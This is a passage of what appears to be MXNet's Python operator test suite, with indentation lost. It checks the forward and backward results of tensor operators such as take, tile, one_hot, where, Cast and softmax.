expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_device(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
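    # grad_helper mirrors the backward rule of take with an all-ones output gradient: every
    # occurrence of an index adds 1.0 to the corresponding slice of the input along `axis`, so
    # duplicated indices accumulate in grad_in, which is what exe.backward is checked against
    # further down.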
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_device(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_device(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_device(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_device(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_device(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_device())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_device(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_device(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_device()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
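# Why these values: float16 has 10 fraction bits, so the generator walks the mantissa in steps
# of 2**-11 (representable float16 points and the half-way points between them), optionally
# nudged by +/-2**-23, across the whole float32 exponent range plus both signs and NaN. A worked
# half-way case: 1 + 2**-11 sits midway between 1.0 and 1 + 2**-10, and round-to-nearest-even
# resolves it to 1.0 because the all-zero mantissa is the "even" neighbour, i.e.
# np.float16(1 + 2**-11) == 1.0.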
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_device()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_device().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_device()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_device()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_device()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for _ in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_device())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_device(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for _ in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for _ in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_device(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_device(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_device(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for _ in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_device(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_device(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_device(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
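# Added illustrative cross-check (not an original MXNet test, same-shape case only):
# the loop-based reference helpers above agree with plain numpy vectorised expressions,
# np.where for the forward pass and boolean routing of grad_in for the backward pass.
# The underscore names below are local to this sketch.
_c, _x, _y = get_forward_inputs_same_shape((3, 4))
assert same(get_forward_expected_output(_c, _x, _y), np.where(_c != 0, _x, _y))
_g = get_backward_input((3, 4))
_, _gx, _gy = get_backward_expected_outputs(_g, _c)
assert same(_gx, np.where(_c != 0, _g, 0))
assert same(_gy, np.where(_c != 0, 0, _g))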
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_device(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_device(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert same(expect_out, out)
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
